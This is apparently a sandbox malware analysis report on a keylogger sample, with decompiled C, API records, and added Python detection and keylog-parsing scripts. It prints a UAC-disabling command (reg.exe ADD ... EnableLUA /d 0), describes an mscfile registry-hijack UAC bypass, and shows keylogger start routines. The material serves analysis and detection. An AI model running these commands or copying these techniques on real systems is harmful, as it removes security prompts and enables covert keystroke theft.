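What E10596DE5 does, read from the listing above: it saves a handler value read from HKEY_CLASSES_ROOT (0x80000000) under the name "origmsc", writes a per-user handler under HKEY_CURRENT_USER (0x80000001) at Software\Classes\mscfile\shell\open\command, launches something via ShellExecuteW (the target path is built from the string at 0x45f780, which the report does not print) and calls ExitProcess(0) if the launch succeeded (return value above 32); otherwise it cleans up and returns 2. The whole branch is gated on the value returned by E10596F83 being below 0x3a9f (15007); the page does not say what that function returns, but a Windows build-number gate would fit a per-user mscfile handler hijack that only works on older Windows 10 builds. The CreateProcessA record at the end of this page shows the second UAC-related behaviour: cmd.exe /k reg.exe ADD ... Policies\System /v EnableLUA /t REG_DWORD /d 0 /f. The detection logic below is an added example for both behaviours; it is not code from the report or from the sample. The events are constructed in Sysmon's field naming (EventID 13 = registry value set, EventID 1 = process create, HKCU rendered as HKU\<SID>); only the two registry paths and the reg.exe command line are taken from the page.

```python
"""Detection logic for the two UAC-related behaviours shown on this page.

Added example; not code from the report or from the sample. Events are
constructed in Sysmon's field naming (EventID 13 = registry value set,
EventID 1 = process create). Only the two registry paths and the reg.exe
command line come from the page.
"""
import re

# Per-user handler hijack used for the mscfile UAC bypass. Sysmon writes
# HKCU as HKU\<SID>, so match on the subkey path only.
MSCFILE_CMD = re.compile(r"\\Software\\Classes\\mscfile\\shell\\open\\command", re.I)
# reg.exe ADD ... /v EnableLUA /t REG_DWORD /d 0 (command line from the page)
ENABLELUA_OFF = re.compile(r"/v\s+EnableLUA\s+/t\s+REG_DWORD\s+/d\s+0\b", re.I)
POLICIES_SYSTEM = r"\software\microsoft\windows\currentversion\policies\system"

SAMPLE_EVENTS = [  # constructed for this example, not from the sandbox run
    {"EventID": 13, "Image": r"C:\Users\u\AppData\Local\Temp\IQl00lxPjo.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\mscfile\shell\open\command\(Default)",
     "Details": r"C:\Users\u\AppData\Local\Temp\IQl00lxPjo.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /k C:\Windows\System32\reg.exe ADD "
                    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "
                    r"/v EnableLUA /t REG_DWORD /d 0 /f"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"EventID": 13, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\.txt\(Default)",
     "Details": "txtfile"},
]


def classify(event):
    """Return a finding name for one event, or None when nothing matches."""
    eid = event.get("EventID")
    if eid == 13:
        target = event.get("TargetObject", "")
        if MSCFILE_CMD.search(target):
            # A clean system has no per-user mscfile key at all, so any write
            # here is worth an alert regardless of the value written.
            return "uac_bypass_mscfile_handler_hijack"
        if (target.lower().endswith(POLICIES_SYSTEM + r"\enablelua")
                and event.get("Details", "").endswith("(0x00000000)")):
            return "uac_disabled_enablelua_zero"
    if eid == 1 and ENABLELUA_OFF.search(event.get("CommandLine", "")):
        return "uac_disable_enablelua_cmdline"
    return None


def scan(events):
    """Return (index, finding, image) for every event that matches."""
    out = []
    for i, e in enumerate(events):
        finding = classify(e)
        if finding:
            out.append((i, finding, e.get("Image", "")))
    return out


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The two findings differ in urgency: the handler hijack takes effect on the next launch of an auto-elevating .msc host, while EnableLUA=0 only applies after the next logon or reboot, so the command-line hit is the earlier signal and the EventID 13 hit confirms the write actually landed. Matching on the Software\Classes\mscfile subkey rather than the full HKU\<SID> prefix keeps the rule independent of the user's SID.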

                    C-Code - Quality: 63%
                    			E1059A4A2(void* __ebx, void* __ecx, void* __eflags, char _a4) {
                    				struct _SYSTEMTIME _v20;
                    				char _v44;
                    				char _v68;
                    				void* __edi;
                    				void* __esi;
                    				WCHAR* _t33;
                    				void* _t65;
                    				void* _t67;
                    				void* _t70;
                    
                    				_t70 = __eflags;
                    				_t42 = __ebx;
                    				_t67 = __ecx;
                    				GetLocalTime( &_v20);
                    				E10592D68( &_a4, _t26, _t67, E10593F14(__ebx,  &_v44, E1059ACD7( &_v68, 0x45fa38, _t70,  &_a4), _t65, _t70, 0x45fa2c));
                    				E10592D5E();
                    				E10592D5E();
                    				_push(0x64 + E105932F7() * 2);
                    				_t33 = E105CA364( &_a4);
                    				_t66 = _t33;
                    				_push(_v20.wSecond & 0x0000ffff);
                    				_push(_v20.wMinute & 0x0000ffff);
                    				_push(_v20.wHour & 0x0000ffff);
                    				_push(_v20.wDay & 0x0000ffff);
                    				_push(_v20.wMonth & 0x0000ffff);
                    				_push(_v20.wYear & 0x0000ffff);
                    				wsprintfW(_t33, E10592D59( &_a4));
                    				if( *((char*)(_t67 + 0x49)) != 0) {
                    					_t19 = _t67 + 4; // 0x46c354
                    					E105984DA(__ebx, _t19, _t66, _t66);
                    				}
                    				if( *((char*)(_t67 + 0x4a)) != 0) {
                    					_t21 = _t67 + 0x1c; // 0x46c36c
                    					E105984DA(_t42, _t21, _t66, _t66);
                    					_t22 = _t67 + 0x3c; // 0x0
                    					SetEvent( *_t22);
                    				}
                    				L105CA35F(_t66);
                    				return E10592D5E();
                    			}

                    APIs
                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 1059A4B0
                      • Part of subcall function 1059ACD7: char_traits.LIBCPMT ref: 1059ACE7
                    • wsprintfW.USER32 ref: 1059A531
                    • SetEvent.KERNEL32(00000000,00000000), ref: 1059A55B
                    Strings
                    • Offline Keylogger Started, xrefs: 1059A4A9
                    • [%04i/%02i/%02i %02i:%02i:%02i , xrefs: 1059A4B9
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: EventLocalTimechar_traitswsprintf
                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started
                    • API String ID: 3003339404-184404310
                    • Opcode ID: e78513ce471e01390422280fb926610f3b166ff2d0cede4c6fe8c64959c11900
                    • Instruction ID: ad7ae041aac65748eed67d64de5a4ffe07faba38a61385cfd10813d67b25c8fe
                    • Opcode Fuzzy Hash: e78513ce471e01390422280fb926610f3b166ff2d0cede4c6fe8c64959c11900
                    • Instruction Fuzzy Hash: BA21687A500218AACB18DBA4EC59DFF7FB8EF84751F00411EF44652091EF74BA46D7A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateThread.KERNEL32(00000000,00000000,0040884B,?,00000000,00000000), ref: 004087CA
                    • CreateThread.KERNEL32(00000000,00000000,00408830,?,00000000,00000000), ref: 004087DA
                    • CreateThread.KERNEL32(00000000,00000000,0040885A,?,00000000,00000000), ref: 004087E6
                      • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                      • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                      • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CreateThread$EventLocalTimewsprintf
                    • String ID: Offline Keylogger Started$[Info]
                    • API String ID: 3534694722-3531117058
                    • Opcode ID: 1e8aff02d5c109468fd494a4a84b3e52d0648772be4b1af5f9673befedfce18a
                    • Instruction ID: e7dd77b1288fa42652556686635590a3b19cb298011fac88deeca58e0b290907
                    • Opcode Fuzzy Hash: 1e8aff02d5c109468fd494a4a84b3e52d0648772be4b1af5f9673befedfce18a
                    • Instruction Fuzzy Hash: 5711A7B21003083AD214B6668D86DBB3A5CDA9139CB40053FF985221D3EE785E59C6FA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                      • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                      • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                      • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                    • CreateThread.KERNEL32(00000000,00000000,Function_00008830,?,00000000,00000000), ref: 0040942D
                    • CreateThread.KERNEL32(00000000,00000000,Function_0000885A,?,00000000,00000000), ref: 00409439
                    • CreateThread.KERNEL32(00000000,00000000,Function_00008869,?,00000000,00000000), ref: 00409445
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CreateThread$LocalTime$Eventwsprintf
                    • String ID: Online Keylogger Started$[Info]
                    • API String ID: 3546759147-3401407043
                    • Opcode ID: 252a10f4c7db2c3d790c08ea6cd02ea1070b72bc27798e53e0cb27eb6ddf0f2a
                    • Instruction ID: 55f70c683c1dd9f299002b3fa9371d2aabc85af949f207a7a15db3bb5bde523d
                    • Opcode Fuzzy Hash: 252a10f4c7db2c3d790c08ea6cd02ea1070b72bc27798e53e0cb27eb6ddf0f2a
                    • Instruction Fuzzy Hash: 5501C8A16002193AD62476764C86DBF7A6CCA81398F80057FFA85321C3D97D5C4A82FA
                    Uniqueness

                    Uniqueness Score: -1.00%
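The two CreateThread records above start the keylogger threads and, through the routine at 00409634 (the same GetLocalTime / wsprintfW / SetEvent sequence that E1059A4A2 shows in the 10590000 dump), write a header line built from the format "[%04i/%02i/%02i %02i:%02i:%02i " followed by the message passed in ("Offline Keylogger Started" or "Online Keylogger Started"). The parser below is an added example for reading such logs during forensics; it is not code from the report or from the sample. The only format fact taken from the page is that timestamp prefix; the closing "]", the window-title header lines in the constructed sample and the on-disk encoding (wsprintfW produces UTF-16, but the report does not show how the buffer is written out) are assumptions.

```python
"""Parser for keylog header lines in the form shown on this page.

Added example; not code from the report or from the sample. The only
format fact taken from the page is the wsprintfW prefix
"[%04i/%02i/%02i %02i:%02i:%02i " followed by the message text. The
closing "]" and the on-disk encoding are assumptions (see comments).
"""
import re
from datetime import datetime

# Prefix from the page; the optional trailing "]" is an assumption about the
# suffix string (0x45fa2c) that the report does not print.
HEADER = re.compile(
    r"^\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) (.*?)\]?\s*$")

# Constructed sample, not a real log from the sandbox run. The window-title
# header between the two start markers is an assumption about how keystrokes
# are grouped.
SAMPLE_LOG = (
    "[2021/09/27 10:15:30 Offline Keylogger Started]\n"
    "[2021/09/27 10:15:41 Untitled - Notepad]\n"
    "hello\n"
    "world\n"
    "[2021/09/27 10:16:02 Online Keylogger Started]\n"
)


def decode_keylog(raw):
    """bytes -> str. A BOM-prefixed file is decoded as UTF-16 (assumption,
    since the header is built with wsprintfW); anything else as UTF-8."""
    if isinstance(raw, str):
        return raw
    if raw.startswith(b"\xff\xfe") or raw.startswith(b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


def parse_keylog(raw):
    """Split a log into records: one per header line, each carrying the
    timestamp, the header text and the raw lines that followed it."""
    records = []
    for line in decode_keylog(raw).splitlines():
        m = HEADER.match(line)
        if m:
            y, mo, d, h, mi, s, text = m.groups()
            records.append({
                "ts": datetime(int(y), int(mo), int(d), int(h), int(mi), int(s)),
                "text": text,
                "keys": [],
            })
        elif records:
            # keystroke lines belong to the most recent header
            records[-1]["keys"].append(line)
        # lines before the first header carry no timestamp and are dropped
    return records


def session_markers(records):
    """(timestamp, mode) for every 'Keylogger Started' header line, which
    gives the times at which logging was (re)started and in which mode."""
    return [(r["ts"], r["text"].split(" Keylogger Started")[0])
            for r in records if r["text"].endswith("Keylogger Started")]


if __name__ == "__main__":
    for r in parse_keylog(SAMPLE_LOG):
        print(r["ts"], r["text"], r["keys"])
```

The timestamps come from GetLocalTime, so they are in the victim machine's local time zone and must be shifted when correlating with UTC-stamped telemetry.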

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ClassCreateErrorLastRegisterWindow
                    • String ID: 0$MsgWindowClass
                    • API String ID: 2877667751-2410386613
                    • Opcode ID: 5b319139d7b0d8ddb928504e795f3afc4ee04627d45882bf3fb29fdebd777872
                    • Instruction ID: f0a002e5d6844cc511498de055204cae26f23d85833bd85c71c7d36cbbae9e50
                    • Opcode Fuzzy Hash: 5b319139d7b0d8ddb928504e795f3afc4ee04627d45882bf3fb29fdebd777872
                    • Instruction Fuzzy Hash: E901E9B590031DABDB01DF959C849EFBBBCFB05795F40492AF910A6240EB749A058BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00432D28
                      • Part of subcall function 00433360: ___AdjustPointer.LIBCMT ref: 004333AA
                    • _UnwindNestedFrames.LIBCMT ref: 00432D3F
                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 00432D51
                    • CallCatchBlock.LIBVCRUNTIME ref: 00432D75
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                    • String ID: =1C
                    • API String ID: 2633735394-4202346569
                    • Opcode ID: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                    • Instruction ID: 38b21537c4530b1c9b8173811da0cdc334a8e1f77cf9cb4ee3d4fcef770b0dd5
                    • Opcode Fuzzy Hash: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                    • Instruction Fuzzy Hash: 5E011732000109BBCF125F56CD01EDB3BBAFF4C754F04941AFA5866221C37AE861ABA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,0040C5FB,00000000,0046C578,00000001), ref: 0040D43B
                    • CloseHandle.KERNEL32(0040C5FB), ref: 0040D44A
                    • CloseHandle.KERNEL32(00000027), ref: 0040D44F
                    Strings
                    • C:\Windows\System32\cmd.exe, xrefs: 0040D436
                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D431
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreateProcess
                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                    • API String ID: 2922976086-4183131282
                    • Opcode ID: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
                    • Instruction ID: 26fca9c7a1bbdca23175ff39a315bbad59b3fabc2693cff21f74514230984448
                    • Opcode Fuzzy Hash: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
                    • Instruction Fuzzy Hash: BDF012B290061C7FEB105AE9DC85EEFBB6CEB48795F100476F604E6011D5715D148AA5
                    Uniqueness

                    Uniqueness Score: -1.00%
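The CreateProcessA call above runs cmd.exe /k with reg.exe ADD ...\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, which switches UAC off once the machine restarts. As an added example, not part of the sandbox report or of the sample, the Python below scans process-creation records for that command line. It goes beyond the single value the sample writes and also flags ConsentPromptBehaviorAdmin=0 and PromptOnSecureDesktop=0 under the same key, two well-known companion settings. The event lines and the image|commandline record format are constructed for the example.

```python
"""Added example, not part of the sandbox report: detection logic for the UAC
tampering command the sample issues through CreateProcessA. Event lines are
constructed in an image|commandline form chosen for the example."""
import re

UAC_POLICY_KEY = r"software\microsoft\windows\currentversion\policies\system"
# value name (lower case) -> (canonical name, data that weakens UAC)
# EnableLUA=0 is what the sample writes; the other two are the well-known
# companions (elevate without a prompt, no secure desktop).
WEAKENING_VALUES = {
    "enablelua": ("EnableLUA", 0),
    "consentpromptbehavioradmin": ("ConsentPromptBehaviorAdmin", 0),
    "promptonsecuredesktop": ("PromptOnSecureDesktop", 0),
}

# Constructed sample events, loosely modelled on Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\cmd.exe|cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f",
    r"C:\Windows\System32\reg.exe|reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f",
    r"C:\Windows\System32\reg.exe|reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f",
    r"C:\Windows\System32\reg.exe|reg.exe query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA",
    r'C:\Windows\System32\reg.exe|reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f',
    r"C:\Program Files\App\app.exe|app.exe --config C:\Users\x\config.ini",
]


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_reg_add(tokens):
    """Find a 'reg add <key> ...' invocation anywhere in the tokens (it may be
    wrapped in cmd.exe /k or /c) and return (key, options), all lower-cased."""
    low = [t.lower() for t in tokens]
    for i, tok in enumerate(low[:-2]):
        if (tok == "reg" or tok.endswith("reg.exe")) and low[i + 1] == "add":
            key, opts, rest = low[i + 2], {}, low[i + 3:]
            j = 0
            while j < len(rest):
                if rest[j].startswith("/") and j + 1 < len(rest) and not rest[j + 1].startswith("/"):
                    opts[rest[j]] = rest[j + 1]   # /v name, /t type, /d data
                    j += 2
                else:
                    j += 1                        # bare switch such as /f
            return key, opts
    return None


def find_uac_tampering(events):
    """Return (image, value name) for every event that writes a UAC-weakening value."""
    hits = []
    for line in events:
        image, _, cmdline = line.partition("|")
        parsed = parse_reg_add(tokenize(cmdline))
        if parsed is None:
            continue
        key, opts = parsed
        name = opts.get("/v")
        if UAC_POLICY_KEY not in key or name not in WEAKENING_VALUES:
            continue
        canonical, bad_data = WEAKENING_VALUES[name]
        try:
            if int(opts.get("/d", ""), 0) != bad_data:   # reg.exe accepts decimal or 0x hex
                continue
        except ValueError:
            continue
        hits.append((image, canonical))
    return hits


if __name__ == "__main__":
    for image, value in find_uac_tampering(SAMPLE_EVENTS):
        print(f"UAC tampering: {value} written by {image}")
```

Command-line matching catches this particular launcher; because the same value can be written without reg.exe at all, a production rule should also watch the registry write itself (the value under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System) rather than only the process tree.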

                    APIs
                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405196), ref: 004051B1
                    • CloseHandle.KERNEL32(?), ref: 00405207
                    • SetEvent.KERNEL32(?), ref: 00405216
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandleObjectSingleWait
                    • String ID: Connection timeout$[WARNING]
                    • API String ID: 2055531096-1470507543
                    • Opcode ID: 0ba4f2503bf5f0317bc10ecb581ea82cfaeb46762227d70d6f5b6137543dff9d
                    • Instruction ID: 7da91c5eb563825218e032d44bddc69cdf30f244b65d1975d56df2ebc3a46463
                    • Opcode Fuzzy Hash: 0ba4f2503bf5f0317bc10ecb581ea82cfaeb46762227d70d6f5b6137543dff9d
                    • Instruction Fuzzy Hash: B801B131A41B40AFC721AF75884651BBBA4EF0530A700447EE5C3A6AA2CBB89404CF9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041271D
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell
                    • String ID: /C $8E@$cmd.exe$open
                    • API String ID: 587946157-914314769
                    • Opcode ID: 7aa96fee03e6401ac1b22889eba9856a68264f954b39489df8aa8793d1cc152a
                    • Instruction ID: 47ea0f4151d847ad7c85bc2547405b4448f03a7c8d467b7d431ad20f766adf74
                    • Opcode Fuzzy Hash: 7aa96fee03e6401ac1b22889eba9856a68264f954b39489df8aa8793d1cc152a
                    • Instruction Fuzzy Hash: 6BF036711183415BC204FB72D8919BFB3A9AB90309F10083FB946A20E3EF385919865E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040B836
                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040B875
                      • Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303BF
                      • Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303E3
                    • std::bad_exception::bad_exception.LIBCMT ref: 0040B88D
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040B89B
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                    • String ID: bad locale name
                    • API String ID: 3706160523-1405518554
                    • Opcode ID: e4434316a2aa22c80a8ecccf78aeb5c6b4e9cbfc58a69b48d55e7b8d31bdf15a
                    • Instruction ID: 089b12ecbc6339823181e46ec4ed0a9302f8c45fa17c933d22815baa8faf1e53
                    • Opcode Fuzzy Hash: e4434316a2aa22c80a8ecccf78aeb5c6b4e9cbfc58a69b48d55e7b8d31bdf15a
                    • Instruction Fuzzy Hash: 1DF031318042086BC228FAA5ED57A9A7374AF14754F50463FF946224D1EF7CB54DC68D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0043CB84,00000003,?,0043CB24,00000003,00468188,0000000C,0043CC37,00000003,00000002), ref: 0043CBAF
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0043CBC2
                    • FreeLibrary.KERNEL32(00000000,?,?,?,0043CB84,00000003,?,0043CB24,00000003,00468188,0000000C,0043CC37,00000003,00000002,00000000), ref: 0043CBE5
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 2bff9b1b25c75f2ab9dfba9e343501fb02229992b6015e3b8712204befcae99e
                    • Instruction ID: 0c177611bbbd006dab77ec3e98d2de005c4c22a3b60f3add798cea3a54e6debe
                    • Opcode Fuzzy Hash: 2bff9b1b25c75f2ab9dfba9e343501fb02229992b6015e3b8712204befcae99e
                    • Instruction Fuzzy Hash: B8F03130600218ABCB115F65EC4AB9EFFB5EB04752F1040BAF805A2291DB759A54CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
                    • Instruction ID: 0e8ff1e7bf94726707b95a2ea2eb2a738027cd1da7e878330fc773e679c7ecaa
                    • Opcode Fuzzy Hash: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
                    • Instruction Fuzzy Hash: 5171D231900216ABCF21CF59C884BBFBB75EF59324F14222BEA1167282D7789D41C7E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E105952F4(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, signed int* _a8, signed int _a12) {
                    				char _v8;
                    				void* _v40;
                    				char _v44;
                    				char _v52;
                    				char _v56;
                    				char _v60;
                    				char _v76;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t26;
                    				signed int* _t28;
                    				intOrPtr* _t30;
                    				signed int _t38;
                    				intOrPtr _t48;
                    				signed int _t57;
                    				signed int _t59;
                    				signed int _t62;
                    				void* _t66;
                    				signed int _t67;
                    				void* _t69;
                    				signed int _t78;
                    				void* _t81;
                    				void* _t129;
                    				signed int _t131;
                    				signed int _t133;
                    				signed int _t134;
                    				signed int _t135;
                    				signed int _t136;
                    				signed int _t137;
                    				signed int _t141;
                    				void* _t144;
                    				void* _t145;
                    				intOrPtr* _t146;
                    
                    				_push(__edi);
                    				_t125 = _a8;
                    				_t129 = __ecx;
                    				_t26 = E10593648(__ecx, _a8);
                    				_t81 = _t129;
                    				_t152 = _t26;
                    				if(_t26 == 0) {
                    					_push(__ebx);
                    					E10593727(_t81, __edx, 0);
                    					_t28 = E105930AD();
                    					_t78 = _a12;
                    					_a8 = _t28;
                    					_t120 =  *_t28;
                    					__eflags =  !_t120 - _t78;
                    					if( !_t120 <= _t78) {
                    						E10593746(_t129);
                    						asm("int3");
                    						_push(_t129);
                    						_t30 = E10592E03( &_v8);
                    						E10595114( &_v8,  &_v44, 4, 0xffffffff);
                    						_t144 = (_t141 & 0xfffffff8) - 0xc;
                    						E10592F5A(_t78, _t144, _t120, __eflags, 0x46c238);
                    						_t145 = _t144 - 0x18;
                    						E10592F5A(_t78, _t145, _t120, __eflags,  &_v60);
                    						E105A82E6( &_v76, _t120);
                    						_t146 = _t145 + 0x30;
                    						_t131 =  *_t30 - 0x3c;
                    						__eflags = _t131;
                    						if(__eflags == 0) {
                    							E10592CB7( &_v52, _t120, __eflags, 0);
                    							_t38 = E105932F7();
                    							E10592E03(E10592CB7( &_v56, _t120, __eflags, 0));
                    							_t120 = _t38;
                    							_t133 = E105A0509();
                    							__eflags = _t133;
                    							if(_t133 != 0) {
                    								 *0x46bac4 = E105A079F(_t133, 0x45f4a4);
                    								 *0x46bac0 = E105A079F(_t133, 0x45f4b0);
                    								_t48 = E105A079F(_t133, 0x45f4bc);
                    								_t120 = 0x45f4c8;
                    								 *0x46bac8 = _t48;
                    								 *0x46babc = E105A079F(_t133, 0x45f4c8);
                    								 *0x46baaa = 1;
                    								E10592F5A(_t78, _t146 - 0x18, 0x45f4c8, __eflags, 0x46c1b8);
                    								_push(0x1b);
                    								goto L23;
                    							}
                    						} else {
                    							_t134 = _t131 - 1;
                    							__eflags = _t134;
                    							if(_t134 == 0) {
                    								__eflags =  *0x46ba77;
                    								if(__eflags != 0) {
                    									goto L20;
                    								}
                    							} else {
                    								_t135 = _t134 - 1;
                    								__eflags = _t135;
                    								if(_t135 == 0) {
                    									 *0x46bac0();
                    									 *0x46ba77 = 0;
                    								} else {
                    									_t136 = _t135 - 1;
                    									__eflags = _t136;
                    									if(_t136 == 0) {
                    										_t57 =  *0x46bac4();
                    										 *0x46ba77 = _t57;
                    										__eflags = _t57;
                    										if(__eflags == 0) {
                    											goto L15;
                    										} else {
                    											L20:
                    											_t120 = E105C75D7(_t52, E10592E03(E10592CB7( &_v52, _t120, __eflags, 0)));
                    											E1059558C(_a4, _t54, __eflags);
                    										}
                    									} else {
                    										_t137 = _t136 - 1;
                    										__eflags = _t137;
                    										if(_t137 == 0) {
                    											_t59 =  *0x46bac4();
                    											 *0x46ba77 = _t59;
                    											__eflags = _t59;
                    											if(__eflags == 0) {
                    												L15:
                    												E10592F5A(_t78, _t146 - 0x18, _t120, __eflags, 0x46c1b8);
                    												_push(0x41);
                    												L23:
                    												E10595912(_t78, _a4, _t120, __eflags);
                    											} else {
                    												_t62 = E105C75D7(_t60, E10592E03(E10592CB7( &_v52, _t120, __eflags, _t137)));
